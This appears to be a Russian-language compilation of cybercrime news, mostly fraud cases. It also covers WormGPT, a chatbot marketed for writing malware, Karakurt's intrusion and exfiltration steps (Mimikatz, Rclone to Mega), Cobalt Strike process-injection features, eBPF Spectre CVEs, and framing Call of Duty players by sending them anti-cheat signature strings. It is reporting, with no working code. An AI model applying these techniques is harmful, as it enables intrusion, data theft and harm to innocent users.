Есть также партнеры, которые сотрудничают с вымогателями и делают основную работу по проведению атаки. По словам исследователей, оператор программы- вымогателя получает долю прибыли в размере от 20% до 40% от выкупа, в то время как оставшиеся 60%-80% остаются у партнера. Такие партнеры тщательно проверяются и выбираются на основе географических предпочтений, политических взглядов и пр.
Полиция Гонконга задержала 458 человек в рамках 314 дел, связанных с мошенничеством и отмыванием денег на общую сумму $60 млн. Из этой суммы около $15 млн были отмыты через криптовалюты.
Полиция сообщила, что задержанные были замешаны в финансовых преступлениях, связанных с онлайн-покупками, поиском работы, инвестициями, телефонными звонками и знакомствами через Интернет. Организаторы преступных группировок вовлекали в свои схемы жертв, выкупая у них пустые банковские счета за суммы от $40 до $200, а затем используя эти счета для отмывания преступных доходов.
За восемь месяцев, с октября 2022 года по июнь 2023-го, преступный синдикат отмыл $15 млн через криптовалюты, уточнили правоохранители. Среди арестованных оказались 330 мужчин и 128 женщин в возрасте от 15 до 82 лет. Полицейские рассказали, что некоторые подозреваемые сами стали жертвами мошенничества — им пообещали участие в некой программе возврата денежных средств.
Для этого пользователей обманом убеждали передать копии своих удостоверений личности, делать селфи на мобильные телефоны и помогать злоумышленникам открывать виртуальные банковские счета, которые впоследствии использовались для отмывания средств, в том числе через криптовалюты.
source: www2.hkej.com/instantnews/current/article/3544582/警方打擊洗黑錢拘458人+涉款4.7億
Автором аналога ChatGPT для киберпреступных сообществ оказался 23-летний португалец Рафаэль Мораиш (Rafael Morais), живущий в Порту. К такому выводу пришел известный западный ИБ-журналист Брайан Кребс ( Brian Krebs ) которому удалось связаться с разработчиком WormGPT.
WormGPT — новый чат-бот, который называют идеальным ИИ-инструментом для написания вредоносного ПО. В последнее время в проекте начали появляться определенные ограничения, поскольку его создатель недоволен активным применением его детища для создания программ-вымогателей и фишинговых кампаний. Сервис, по словам разработчика, «постепенно превращается в более контролируемую среду».
Первоначально WormGPT продавался пользователем с ником Last исключительно на hackforums[.] Стоимость лицензии варьировалась от 500 до 5 тысяч долларов. Исследование постов Last на площадке за прошедшие годы показывает, что у этого человека большой опыт создания и использования вредоносного ПО. Например, в августе 2022 года он опубликовал ветку продаж Arctic Stealer — трояна для кражи данных и регистратора нажатий клавиш. Также он продавал модифицированную версию инфостилера DCRat.
«Вскоре после присоединения к форуму в начале 2021 года Last сообщил нескольким пользователям, что его зовут Рафаэль и что он из Португалии. На HackForums есть функция, которая позволяет любому желающему изучить сообщения пользователя и выяснить, к каким учетным записям он имел отношение в прошлом», — написал Кребс.
Благодаря этому журналисту удалось выяснить, что изначально создатель WormGPT использовал ник ruiunashackers. Это достаточно уникальное сочетание при простом поиске в Google указывает на аналогичные учетные записи в TikTok и Instagram, владельцем которых является Рафаэль Мораиш. Он рассказал Кребсу, что недавно окончил политехнический институт в Португалии, где получил степень в области информационных технологий. При этом он подчеркнул, что его вклад в разработку чат-бота не превышает 30-35 процентов, остальное — дело рук других разработчиков. Мораиш рассказал, что лицензионную версию WormGPT приобрели около 200 человек.
«Я делаю это не ради денег. По сути, это был проект, который я считал интересным в начале, и теперь я поддерживаю его, просто чтобы помочь сообществу. Мы многое обновили с момента релиза, наша модель теперь в пять или шесть раз лучше с точки зрения обучения и точности ответов», — сказал португалец.
Мораиш также рассказал, что в основе решения лежит модель GPT-J 6B. Набор данных, на которых обучается и которыми оперирует WormGPT, программист назвал огромным. По его словам, любой, кто протестирует этот продукт, может увидеть, что он ничем не отличается от любого другого чат-бота без цензуры. И именно в таком виде WormGPT и задумывался, но стал оружием в руках киберпреступников. Из-за этого в проекте и появились ограничения.
«Мы запретили некоторые темы, например, все, что связано с убийствами, торговлей наркотиками, похищениями людей, детской порнографией, программами- вымогателями, финансовыми преступлениями», — заключил Мораиш.
При этом, по данным Кребса, Last продвигает свою разработку на ряде площадок именно как чат-бот с опцией создания вредоносного ПО. В частности, он обещает, что заражение будет сложно отследить доступными рядовым пользователям антивирусами.
source: krebsonsecurity[.]com/2023/08/meet-the-brains-behind-the-malware- friendly-ai-chat-service-wormgpt
Вместе с двумя сообщниками преступник организовал крупную цепочку поставок украденных данных в даркнете.
Гражданин США признал себя виновным по обвинениям в организации заговора с целью продажи украденной финансовой информации на рынках даркнета.
40-летний Майкл Михало основал кардинговый сайт в даркнете под названием «Skynet Market». Согласно обвинительному заключению , Михало также руководил двумя другими кампаниями по созданию рынка в начале 2016 года. Его роль заключалась в получении информации об украденных платежных картах. Преступник был арестован в марте 2022 года.
Михало также признался в продаже данных платежных карт на даркнет-рынке AlphaBay, в то время как его партнеры продавали данные карт, полученные им на рынках даркнета Hansa и Wall Street Market.
Министерство юстиции сообщило, что, работая под ником «ggmccloud1», обвиняемый заработал не менее $1 млн. в криптовалюте в период с 22 февраля 2016 года по 1 октября 2019 года. У Михало будут конфискованы не менее $4,5 млн. (сумма составлена с учётом того, что цифровые активы преступника выросли за эти годы).
Михало признал себя виновным по одному пункту обвинения в сговоре с целью совершения мошенничества с устройствами доступа, одному пункту обвинения в мошенничестве с устройствами доступа и шести пунктам обвинения в отмывании денег. Михало грозит максимальный срок тюремного заключения 75 лет.
По делу проходят ещё 2 сообщника Михало. Один из них, 40-летний Тейлор Росс Стаатс признал себя виновным по одному пункту обвинения в заговоре с целью совершения мошенничества с устройствами доступа. У Стаатса было конфисковано $21 тыс.. Основная обязанность Стаатса заключалась в том, чтобы проверить, действительны ли украденные платежные карты.Третий сообщник, гражданин Великобритании Саймон Каура, ожидает экстрадиции в США для предъявления обвинений.
source: dd80b675424c132b90b3-e48385e382d2e5d17821a5e1d8e4c86b.ssl.cf1.rackcdn.com/external/mowd-2233-mihalo- indictment-feb92022.pdf
Исследователь ₿liteZero выяснил, что хакеры Ronin перевели украденные активы из Ethereum в сеть Биткойн.
Исследователь BliteZero из компании SlowMist отследил путь транзакций украденных средств после атаки на Ronin. Максимальная сумма украденных средств была изначально конвертирована в ETH и отправлена в авторизованный миксер криптовалюты Ethereum Tornado Cash, а затем переведена в сеть Биткойн и преобразована в BTC по протоколу Ren.
После этого хакеры отправили большую часть средств на криптомиксеры, такие как ChipMixer и Blender. Они перевели средства в ChipMixer, а затем вывели часть в Blender.
Напомним, что 23 марта стало известно о краже криптовалюты на сумму около 625 миллионов из блокчейна Ronin, лежащего в основе популярной криптоигры Axie Infinity.
Ни одна из хакерских групп официально о взломе не заявляла. Однако, американские власти определили, что адрес цифровой валюты, используемый хакерами, находится под контролем северокорейской хакерской группы Lazarus.
This release sees new options for process injection, updates to the sleep mask and UDRL kits, evasion improvements and a command history update along with other, smaller changes.
Before getting into the details of the release, I just wanted to impress upon you how seriously we take product security. We dedicated a significant portion of this release to improving controls around product licensing. We are fully committed to improving the security of the product and will continue to make product security enhancements a priority in future releases.
Until now, Cobalt Strike's only [process injection](https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection- the-details-cobalt-strike/) option was the built-in fork & run technique. While this is good for stability, it limits OPSEC options. We have added two new Aggressor Script hooks ( PROCESS_INJECT_SPAWN and PROCESS_INJECT_EXPLICIT ) to allow you to define how the fork & run and explicit injection techniques are implemented when executing post exploitation commands. A new BOF along with an Aggressor Script function implements both of these new techniques. You will now have the option of using the built-in fork & run technique or creating your own process injection technique.

source <https://www.cobaltstrike.com/blog/cobalt-strike-4-5-fork-run-youre- history/>
Специалисты ИБ-компании Accenture Security рассказали о группе высокопрофессиональных хакеров, активизировавших свою деятельность в третьем квартале нынешнего года.
Хакеры, преследующие финансовую выгоду и называющие себя Karakurt, попали в поле зрения исследователей в июне 2021 года, когда зарегистрировали два домена и завели страницу в Twitter.
Основной деятельностью группировки является похищение данных и вымогательство, при этом ПО для шифрования файлов она не использует. По словам самих хакеров, с сентября по ноябрь 2021 года они взломали сети более 40 жертв и опубликовали похищенные файлы на своем сайте.
Порядка 95% жертв находятся в Северной Америке, а остальные – в Европе. Karakurt не интересуют какие-то конкретные отрасли, и виктимология кажется случайной.
Для получения первоначального доступа к сетям атакуемых организаций злоумышленники в основном используют учетные данные для VPN, либо полученные в результате фишинга, либо купленные у продавцов.
Если раньше хакеры обеспечивали постоянство в сети с помощью Cobalt Strike, то недавно они переключились на AnyDesk. Это связано с тем, что в последнее время Cobalt Strike все чаще детектируется решениями безопасности, поэтому киберпреступники (в частности, вымогатели Conti) стали переходить на AnyDesk.
Закрепившись в атакуемой сети, Karakurt похищает дополнительные учетные данные с помощью Mimikatz и использует их для незаметного повышения привилегий.
Похищенные данные архивируются с помощью 7zip и WinZip и отправляются на файлообменник Mega.io через Rclone или FileZilla.
Хотя подобные атаки кажутся не столь разрушительными по сравнению с атаками программ-вымогателей, которые шифруют файлы и удаляют резервные копии, они все равно очень опасны. Угрозы опубликовать похищенную информацию могут иметь серьезные последствия для компании, даже если ее операции не были «заморожены» шифровальщиком.
• Source: <https://www.accenture.com/us-en/blogs/cyber-defense/karakurt- threat-mitigation>
В ядре Linux [выявлены](https://www.openwall.com/lists/oss- security/2021/08/01/3) две уязвимости, позволяющие использовать подсистему еBPF для обхода защиты от атаки Spectre v4 (SSB, Speculative Store Bypass). При помощи непривилегированной BPF-программы атакующий может создать условия для спекулятивного выполнения определённых операций и определить содержимое произвольных областей памяти ядра. Сопровождающие подсистемы eBPF в ядре получили доступ к прототипу эксплоита, демонстрирующего возможность совершения атак на практике. Проблемы устранены в форме патчей, которые войдут в состав ближайшего обновления ядра Linux. Обновления в дистрибутивах пока не сформированы (Debian, RHEL, SUSE, Arch, Fedora, Ubuntu).
Метод атаки Spectre 4 базируется на восстановлении осевших в процессорном кэше данных после отбрасывания результата спекулятивного выполнения операций при обработке чередующихся операций записи и чтения с использованием косвенной адресации. Когда операция чтения следует за операцией записи (например, mov [rbx + rcx], 0x0; mov rax, [rdx + rsi]), смещение адреса для чтения уже может быть известно из-за выполнения похожих операций (операции чтения выполняются значительно чаще и чтение может быть выполнено из кэша) и процессор может спекулятивно выполнить чтение раньше записи, не дожидаясь пока будет вычислено смещение косвенной адресации для записи.
Если после вычисления смещения выявлено пересечение областей памяти для записи и чтения, процессор просто отбросит уже спекулятивно полученный результат чтения и повторит эту операцию. Данная особенность позволяет инструкции чтения получить доступ к старому значению по некоторому адресу во время пока операция сохранения ещё не завершена. После отбрасывания неудачной спекулятивной операции в кэше остаются следы от её выполнения, после чего для его извлечения может применяться один из способов определения содержимого кэша на основе анализа изменения времени доступа к прокэшированным и не прокэшированным данным.
[Первая уязвимость (CVE-2021-35477)](https://security- tracker.debian.org/tracker/CVE-2021-35477) вызвана недоработкой в механизме проверки программ BPF. Для защиты от атаки Spectre 4 верификатор добавляет после потенциально проблемных операций сохранения в память дополнительную инструкцию, сохраняющую нулевое значение для вытеснения следов прошлой операции. Предполагалось, что операция записи нуля выполнится очень быстро и блокирует спекулятивное выполнение, так как она зависит только от указателя на кадр стека BPF. Но на деле, оказалось возможным создание условий, при которых инструкция, приводящая к спекулятивному выполнению, успевает выполниться до операции вытесняющего сохранения.
[Вторая уязвимость (CVE-2021-3455)](https://security- tracker.debian.org/tracker/CVE-2021-3455) связана с тем, что при выявлении верификатором BPF потенциально опасных операций сохранения в память, не учитываются неинициализированные области стека BPF, первая операция записи в которые не защищается. Подобная особенность приводит к возможности совершения спекулятивной операции чтения, зависимой от неинициализированной области памяти, перед выполнением инструкции сохранения. Новая память для BPF-стека выделяется без проверки содержимого, уже имеющегося в выделяемой памяти, и на стадии до запуска BPF-программы имеется способ управления содержимым области памяти, которая затем будет выделена под стек BPF.
На этой неделе Разработчики CD Projekt Red объявили, что следующий крупный патч для Cyberpunk 2077 (1.2) задерживается до следующего месяца из-за недавней атаки на компанию.
В декабре прошлого года разработчики обещали выпустить в январе и феврале большие патчи, которые должны были исправить многоженство ошибок и известных проблем, с которыми сталкиваются игроки, а также улучшить производительность. Патч 1.1 действительно был выпущен в январе, как и планировалось, а вот патч 1.2 теперь был отложен как минимум до середины марта.
«Хотя мы очень хотели выпустить патч 1.2 для Cyberpunk 2077 в заявленные ранее сроки, недавняя кибератака на ИТ-инфраструктуру студии и большой объем этого обновления означают, что этого, к сожалению, не произойдет — нам понадобится дополнительное время», — признаются в CD Projekt Red.
Click to expand...
Напомню, что в начале текущего месяца компания CD Projekt Red сообщила, что стала жертвой шифровальщика. Тогда вымогатели утверждали, что похитили исходные коды таких игр компании, как Cyberpunk 2077, The Witcher 3 (включая еще невышедшую версию с рейтрейсингом) и Gwent, а также финансовую, юридическую, административную и HR документацию.
Сразу после атаки CD Projekt Red заявила, что не намерена вести переговоры с преступниками и платить им выкуп .После чего злоумышленники сначала выставили информацию на аукцион, где стартовая цена «лота» начиналась с 1 000 000 долларов с шагом 500 000 долларов, а «блиц-цена» равнялась 7 000 000 долларов. Но вскоре после этого хакеры якобы продали данные компании «вне рамок форума», получив предложение, которое их устроило.
Источник: xakep.ru/2021/02/26/cyberpunk-2077-patch/
vulnerability database and triage infrastructure for open source projects.
The database aims at helping both open source maintainers and consumers of open source projects.
The archive could allow users and maintainers of open-source software to find the vulnerabilities that affect them, providing detailed info about versions and commits impacted by the issues. Maintainers of open source software could benefit of OSV’s automation to reduce the burden of triage.
“We are excited to launchOSV (Open Source Vulnerabilities), our first step towards improving vulnerability triage for developers and consumers of open source software.” reads the [post ](https://security.googleblog.com/2021/02/launching-osv-better- vulnerability.html)published by Google. “The goal of OSV is to provide precise data on where a vulnerability was introduced and where it got fixed, thereby helping consumers of open source software accurately identify if they are impacted and then make security fixes as quickly as possible.”
At the time of the launch, the database only includes vulnerabilities from OSS-Fuzz (mostly C/C++), but Google plans to add more data sources soon (e.g. npm Registry and PyPI).
OSV already includes information on thousands of vulnerabilities from more than 380 critical open source projects integrated with [Google’s OSS-Fuzz fuzzing service](https://www.securityweek.com/google-launches-oss-fuzz-open- source-fuzzing-service).
_“OSV is a vulnerability database for open source projects. It exposes an API that lets users of these projects query whether or not their versions are impacted.”reads the description of the project.
“For each vulnerability, we perform bisects to figure out the exact commit that introduces the bug, as well the exact commit that fixes it. This is cross referenced against upstream repositories to figure out the affected tags and commit ranges.”_
The OSV database exposes a simple API to query for vulnerabilities, maintainers and users could provide a git commit hash or a version number to receive the list of vulnerabilities that are present for that version.
“Similarly, it is time consuming for maintainers to determine an accurate
list of affected versions or commits across all their branches for downstream
consumers after a vulnerability is fixed, in addition to the process required
for publication.” continues Google. “Unfortunately, many open source projects,
including ones that are critical to modern infrastructure, are under resourced
and overworked. Maintainers don’t always have the bandwidth to create and
publish thorough, accurate information about their vulnerabilities even if
they want to.”
The OSV aims at rethinking and promoting better, scalable vulnerability
tracking for open source.
“In an ideal world, vulnerability management should be done closer to the actual open source development process, aided by automated infrastructure. Projects that depend on open source should be promptly notified and fixes uptaken quickly when a vulnerability is reported,” Google closes.
Users can access the OSV website and documentation at https://osv.dev and explore the open source repo or contribute to the project on GitHub. Google also set up a mailing list to stay up to date with OSV and share your thoughts on vulnerability tracking.
В октябре гигант видеоигр Activision заявил, что исправил ошибку в своей античит-системе, которая затронула «небольшое количество аккаунтов легальных игроков», которые были забанены из-за этой ошибки.
На самом же деле, по словам хакера, который нашел ошибку и использовал ее в своих целях, он смог забанить «тысячи и тысячи» игроков Call of Duty, которых он, по сути, подставил как читеров. Хакер под ником Vizor рассказал TechCrunch об эксплойте и поведал свою версию истории.
«Я мог бы делать это годами, и пока я выбирал бы случайных игроков и никого из известных людей, это прошло бы незамеченным», - сказал Vizor, добавив, что злоупотреблять эксплойтом было „забавно“.
TechCrunch познакомился с Визором благодаря разработчику читов по имени Зеблер, который хорошо знаком с хакерской сценой Call of Duty. Зеблер сказал, что он общался с Визором в течение нескольких месяцев и, соответственно, знал об эксплойте, который, по его словам, он видел, как Визор использовал.
На протяжении многих лет хакеры пытаются найти в онлайн-видеоиграх изъяны, позволяющие устанавливать и использовать читы, которые дают игрокам несправедливое преимущество. Некоторые разработчики читов, такие как Zebleer, продают свои программы как услугу, иногда зарабатывая на этом миллионы долларов. В ответ на это компании, занимающиеся разработкой видеоигр, нанимают специалистов по кибербезопасности, чтобы те разрабатывали и настраивали свои античитерские системы для поимки и запрета игровых мошенников. В 2021 году Activision выпустила свою античит-систему Ricochet, которая работает на уровне ядра, чтобы разработчикам читов было еще сложнее ее обойти.
По словам Визора, ему удалось найти уникальный способ использовать Ricochet против игроков, которых она должна была защищать. Хакер понял, что Ricochet использует список определенных жестко закодированных строк текста в качестве «сигнатур» для обнаружения хакеров. Например, по словам Визора, одной из таких строк было слово «Trigger Bot», которое относится к типу читов, автоматически запускающих оружие читера при наведении перекрестия на цель.
По словам Визора, можно было просто отправить личное сообщение, известное в игре как «шепот», содержащее одну из этих жестко закодированных строк, например «Trigger Bot», и забанить игрока, с которым они общались, в игре.
«Я понял, что античит Ricochet, скорее всего, сканирует устройства игроков на наличие строк, чтобы определить, кто является читером, а кто нет. Это вполне нормальное явление, но сканирование такого объема памяти с помощью всего лишь ASCII-строки и запрет на основании этого крайне чреваты ложными срабатываниями», - сказал Визор, имея в виду, что игра эффективно сканировала запрещенные ключевые слова независимо от контекста.
«В тот же день, когда я обнаружил это, я забанил себя, отправив шепотом сообщение в Call of Duty самому себе с одной из строк в содержимом сообщения»,
По словам Визора, в какой-то момент они разработали скрипт - «присоединиться к игре, написать сообщение, выйти из игры, присоединиться к новой игре, повторить, повторить, повторить», - который запускался автоматически и банил случайных игроков, что позволяло им уезжать в отпуск и при этом банить игроков. По словам Визора, в течение нескольких месяцев, пока они этим занимались, Activision добавляла новые сигнатуры в свою античит-систему, которые вскоре обнаруживались и использовались для бана игроков.
«Я наиболее активно занимался троллингом, когда команда по борьбе с мошенничеством в Ricochet добавляла новые строковые подписи. Так что если я проверял область [памяти] и видел новую строку, я сходил с ума от этого, чтобы они думали, что обнаруживают настоящих читеров», - сказал Визор.
Activision не ответила на просьбу о комментарии.
Человек, который раньше работал в Activision и до сих пор осведомлен о работе команды безопасности и защиты от читов в компании, рассказал TechCrunch, что Ricochet сканировал определенные сигнатуры, и «они могли быть использованы против античита», что, по сути, и было той техникой, которую использовал Визор.
«Если вы знаете, какую сигнатуру ищет античит, я найду механизм, чтобы вставить эти байты в ваш игровой процесс, и вы будете забанены», - сказал человек, попросивший остаться неизвестным. «Я не могу поверить, что [Activision] банит людей на основании сканирования памяти на предмет «триггерного бота». Это так невероятно глупо. Они должны были защищать подписи. Это любительский час».
По словам Vizor, помимо случайных игроков, их жертвами стали и некоторые известные игроки. В период, когда Vizor использовал эксплойт, некоторые стримеры видеоигр писали на X, что были забанены, а затем разбанены, как только Activision исправила ошибку.
Компания была предупреждена о существовании ошибки, когда Зеблер опубликовал
подробности эксплойта на X.
source: [https://techcrunch.com/2024/11/07/h...ll-of-duty-gamers-by-abusing-
anti-cheat-flaw/](https://techcrunch.com/2024/11/07/hacker-says-they-banned-
thousands-of-call-of-duty-gamers-by-abusing-anti-cheat-flaw/)
Сотрудники спецотдела Интерпола задержали в Аргентине бывшего директора барнаульского агентства недвижимости «Жилфонд» Людмилу Авдюхину. Ее поймали у ее дома в Буэнос-Айресе. Подробнее об этой операции рассказали журналисты местной газеты La Nacion.
Людмила Авдюхина стала фигурантом громкого уголовного дела о мошенничестве. Ее обвинили в том, то она, будучи сотрудником агентства недвижимости брала с клиентов деньги, но не выполняла условия договора. По разным данным от ее действий могли пострадать около 30 человек, а общи ущерб от махинаций составил около 100 млн рублей. В декабре 2022 года она Авдюхина перестала выходить на связь с сотрудниками фирмы и непосредственными клиентами.
Через несколько месяцев у правоохранителей появилась информация, что подозреваемая могла переехать в Южную Америку. Спустя почти год информация подтвердилась. Действительно, 1 января 2023 года она пересекла границу Аргентины. Тогда риелторшу не задержали поскольку ордер на международный арест был выдан гораздо позже – только в апреле.
Как выяснилось, Людмила Авдюхина со своей семьей выбрала в качестве места жительства столицу Аргентины, но чтобы конкретное местонахождение не могли установить, примерно раз в 60 дней она переезжала, но каждый раз лишь в соседний район. И только однажды оказалась в пригороде и то ненадолго.
В чужой стране россиянка продолжила свои махинации с недвижимостью:
– За время своего пребывания в Аргентине Авдюхина через подставных лиц вложила средства в недвижимость, — рассказал изданию детектив, занимающийся расследованием на территории Аргентины.
И все же долго бегать от правоохранителей сибирячка не смогла. Интерпол, в том числе его московское отделение, сработало четко: по информации из соцсетей и других открытых источников они вычислили где может находиться преступница и чем она занимается. Как выяснилось, кроме того, что Авдюхина вложилась в местную недвижку, она готовила блюда русской кухни и продавала их в местном магазине. Там-то ее и засекли. Стали вести и в итоге выяснили где она живет вместе со своей семьей. Накануне, когда Людмила вышла на улицу, ее задержали.
В ближайшее время в Буэнос-Айресе состоится суд по экстрадиции и затем перелет в Россию, где Людмилу Авдюхюну ждет не только уголовное преследование, но и несколько десятков обманутых клиентов.
Стоит отметить, что в Барнауле подозреваемая в многомиллионном мошенничестве экс-директор агентства недвижимости имела хорошую репутацию и в свое время даже была номинирована на премию в номинации «Руководитель года».
source: lanacion.com.ar/seguridad/vivia-en-caballito-atraparon-a-una-profuga- de-rusia-acusada-de-una-estafa-de-2-millones-de-dolares-nid02012024/
В отношении старшего следователя Анатолия Белашова возбудили уголовное дело по статье «Халатность» за «случайную потерю» 50 тысяч долларов.
— В октябре 2022 года оперативники МВД по Ставропольскому краю расследовали дело о крупной краже денег клиента «СМП банка». Сотрудники полиции вышли на подозреваемого и нашли у него в мерседесе часть похищенной суммы.
Деньги передали Белашову, который занимался расследованием. Через некоторое время следователь заявил, что потерял вверенные 50 тысяч долларов. Как это произошло, полицейский пояснить не смог.
Они взламывали аккаунты пользователей интернет-сервисов и продавали украденные данные через Telegram.
Преступники использовали спутниковую технологию для получения прямых трансляций матчей на несколько секунд раньше букмекеров. Это позволяло им делать ставки, уже зная результаты. Они ставили на матчи по футболу, теннису и другим видам спорта. Они также подкупили трейдера в букмекерской компании для подтверждения ставок.
При обысках полиция изъяла недвижимость, автомобили, спутниковые антенны, банковские счета, телефоны, наличные и поддельные деньги на сумму €13 000.
source: europol.europa.eu/media-press/newsroom/news/time-out-for-match-fixers- manipulating-livestreams
8 мировых звёзд были вовлечены в мошенническую схему по продвижению незаконных криптоактивов.
8 знаменитостей выплатят штрафы за то, что они проводили шиллинг криптовалюты, скрыв факт оплаты за рекламу. А «заказчик» рекламы был обвинен в мошенничестве.
Зачинщиком масштабной кампании по продвижению криптовалюты является - Джастин Сан, владелец компаний Tron Foundation Limited, BitTorrent Foundation Ltd и Rainberry Inc, которые раньше назывались BitTorrent.
Комиссия по ценным бумагам и биржам США (SEC) заявила, что организации Сана продавали криптоактивы под названием Tronix (TRX) и BitTorrent (BTT), но не были зарегистрированы для торговли активами.
По данным SEC, мошенник манипулировал вторичным рынком TRX посредством обширной фиктивной торговли, которая включала одновременную или почти одновременную покупку и продажу ценных бумаг, чтобы создать впечатление, что бумаги активно торгуются без фактического изменения бенефициарного владельца.
Его также обвиняют в «организации схемы оплаты знаменитостям за рекламу TRX и BTT без раскрытия их вознаграждения».
Одна из знаменитостей, Линдси Лохан, заявила: «Я быстро поняла, что мое сообщество может извлечь выгоду из криптовалюты и что я могу проинформировать большую часть общества, которая не вовлечена в пространство блокчейна, и познакомить пользователей с этой технологией.
Лохан даже выпустила сингл в виде NFT и продвигала токен TRX.
В схему продвижения криптовалюты были вовлечены следующие суперзвёзды:
актер/боксер Джейк Пол;
рэпер/продюсер ДеАндре Кортес Уэй (Soulja Boy);
певец и автор песен Остин Махоуни;
актриса Мишель Мейсон;
рэпер Майлз Паркс МакКоллум (Lil Yachty);
певец/продюссер Шаффер Смит (Ne-Yo);
рэпер/продюссер Алиаун Дамала Тиам (Akon).
Известно, что Остин Махоуни и Soulja Boy заплатили в общей сложности $400 000 штрафа, не признавая и не опровергая выводы SEC.
Масштабы предполагаемой схемы продвижения криптовалюты были значительными. По словам SEC, Джастин Сан «поручил своим шиллерам совершить более 600 000 фиктивных сделок TRX между двумя учетными записями криптобиржи, которые он контролировал, при этом ежедневно проводя от 4,5 до 7,4 млн. фиктивных сделок с TRX.
Как утверждается, Сан также продал TRX на вторичном рынке, заработав $31 млн. от незаконных незарегистрированных предложений и продаж токена.
Гурбир С. Гревал, директор отдела правоприменения Комиссии по ценным бумагам и биржам США, заявил, что Сан использовал «старый метод, чтобы ввести в заблуждение и навредить инвесторам, сначала предлагая ценные бумаги без соблюдения требований регистрации и раскрытия информации, а затем манипулируя рынком этих ценных бумаг».
Гревал заявил, что Сан заплатил знаменитостям за рекламу незарегистрированных предложений, договорившись с ними не раскрывать факт оплаты. По словам Гревала, против такой деятельности и были разработаны федеральные законы о ценных бумагах.
Мошенники создали пирамиду Forsage, которая собрала более $300 млн.
Комиссия по ценным бумагам и биржам США ( SEC ) предъявила обвинения четыре основателям проекта, проживающих в России, Грузии и Индонезии, трем промоутерам из США, а также членам организации Crypto Crusaders, которая продвигала Forsage в США.
Forsage была запущена в январе 2020 года и предоставляла ритейлерам доступ к транзакциям через смарт-контракты – компьютерные протоколы, которые позволяют проводить сделки и контролируют их исполнение с помощью математических алгоритмов. Пирамида работала на блокчейнах Ethereum, Tron и Binance.
Следуя классической схеме Понци, Forsage использовала активы новых инвесторов для выплат более ранним инвесторам, которые получали прибыль за счет привлечения новых людей.
"Forsage – это хрестоматийная пирамида и схема Понци... Основным способом получения прибыли инвесторами Forsage была вербовка других людей в схему", – говорится в иске SEC.
Этой схеме удалось привлечь более $300 миллионов за счет размещения незарегистрированных ценных бумаг.
"Как говорится в жалобе SEC, Forsage – это масштабная финансовая пирамида, агрессивно рекламируемая инвесторам", – сказала Каролин Уэлшанс, исполняющая обязанности руководителя отдела криптоактивов и кибернетики SEC. "Мошенники не могут обойти федеральные законы о ценных бумагах, сосредоточив свои схемы на смарт-контрактах и блокчейне".
source: sec.gov/news/press-release/2022-134 | incrypted.com/fbi-warns-about-crime-scheme-with-false-crypto-apps/
15 сентября 24-летний соучредитель фонда Virgil Capital Стефан Цинь был приговорен к 7 с половиной годам заключения. Его фонд оказался очередной схемой Понци, пишет Bloomberg.
Инвесторы Стефана Циня считали, что они нашли беспроигрышный путь — хедж-фонд, генерирующий 500% дохода, используя разницу курсов криптовалюты на сорока различных биржах.
На самом деле 24-летний самопровозглашенный гений математики тратил их средства на неудачные инвестиции в недвижимость и роскошный способ жизни, арендуя квартиру на Манхэттене за $23 000 в месяц.
Федеральные прокуроры заявляют, что Цинь обманул более чем сотню людей на $90 млн.
По словам Циня, во время обучения на первом курсе он разработал алгоритм под названием Тенджин.
Программа позволяла зарабатывать, покупая криптовалюту на одной бирже и продавая по более высокой цене на другой. В 2017 он хвастался, что его фонд генерировал 500% доходов ежегодно.
В 2018, когда о юноше написал The Wall Street Journal, он распоряжался $23,5 млн. К 2020 он смог привлечь более $90 млн.
В конце прошлого года, когда потери фонда начали расти, инвесторы стали требовать возврата средств.
Чтобы выплатить их, Цинь попытался использовать свой другой фонд, VQR Multistrategy Fund LP, но Комиссия по ценным бумагам и биржам США заморозила активы VQR.
После этого, Цинь вернулся в США из Южной Кореи, сдался властям и признал свою вину.
Прокуроры требовали для Циня самого жестокого вердикта, учитывая «наглый» характер его преступления.
Его адвокаты просили о приговоре в 24 месяца, подчеркивая, что Цинь добровольно сдался властям, взял ответственность и помог вернуть часть потерянных средств.
Но 15 сентября он был приговорен к семи с половиной годам. Судья назвал его «потенциально очень опасной личностью» и отметил, что приговор должен отпугнуть других мошенников.
Как известно, в начале 2021 года поддержка Adobe Flash Player была окончательно прекращена. В код ПО заранее встроили специальный код для самоуничтожения, а начиная с 12 января 2021 года Adobe блокирует запуск любого Flash-контента.
Однако в Китае Adobe разрешила местной компании Zhong Cheng Network поддерживать Flash и далее, так как он все еще является важной частью местной ИТ-экосистемы и широко используется как в государственном, так в и частном секторах. К примеру, в начале года из-за прекращения поддержки Flash серьезные проблемы возникли у китайских железнодорожников.
Специальная китайская версия Flash распространяется через сайт flash[.]cn, и недавно эксперты Minerva Labs обнаружили, что она небезопасна. По словам исследователей, помимо самого Flash на машины пользователей проникают и другие пейлоады. В частности, приложение загружало и запускало внутри процесса FlashHelperService.exe файл nt.dll, который открывает новое окно браузера через равные промежутки времени и демонстрирует различные сайты с большим количеством рекламы и всплывающих окон.

На подозрительное поведение этого процесса обратили внимание и аналитики Cisco Talos, которые отмечали, что FlashHelperService.exe стал одной из лидирующих угроз января (1, 2), а затем и февраля (1, 2).
Пользователи тоже заметили эту проблему. Многочисленные жалобы уже можно найти на форуме поддержки Adobe, в местных блогах и так далее.
Источник: xakep.ru/2021/02/24/china-flash/
Сотрудники Управления по организации борьбы с противоправным использованием информационно-коммуникационных технологий ГУ МВД России по Новосибирской области при силовой поддержке бойцов регионального Управления Росгвардии пресекли деятельность 4 жителей областного центра, подозреваемых в дистанционном мошенничестве.
Предварительно установлено, что 29-летний мужчина для реализации криминальной схемы вовлёк в неё троих своих знакомых в возрасте 30-35 лет. Злоумышленники, арендовав помещение в офисном здании, расположенном в Октябрьском районе Новосибирска, организовали там кол-центр. После чего, используя нелегальную базу финансовых организаций, они звонили гражданам, оставившим заявки на получение кредита на сайтах в сети Интернет.
Сообщники убеждали людей перечислять им денежные средства под предлогом необходимости оплаты дополнительных услуг по выдаче займа (открытие счета, оплата страховки, курьерской доставки документов, инкассации).
В настоящее время установлено 5 потерпевших в возрасте от 21 до 64 лет, пострадавших от рук подельников. Это жители Ставропольского и Пермского краев, городов Луганска, Нефтекамска и Калининграда. Общая сумма ущерба превысила 320 тысяч рублей.
По адресам проживания подозреваемых полицейскими проведены обыски. Оперативниками обнаружено и изъято: 14 единиц компьютерной техники, 5 модемов, 3 накопителя информации, 30 телефонов, 12 сим-карт различных операторов связи, черновые записи, 20 банковских карт, оформленных на третьих лиц, и денежные средства в размере 156 тысяч рублей, полученные, предположительно, преступным путём.
Все задержанные подозреваемые дали признательные показания.
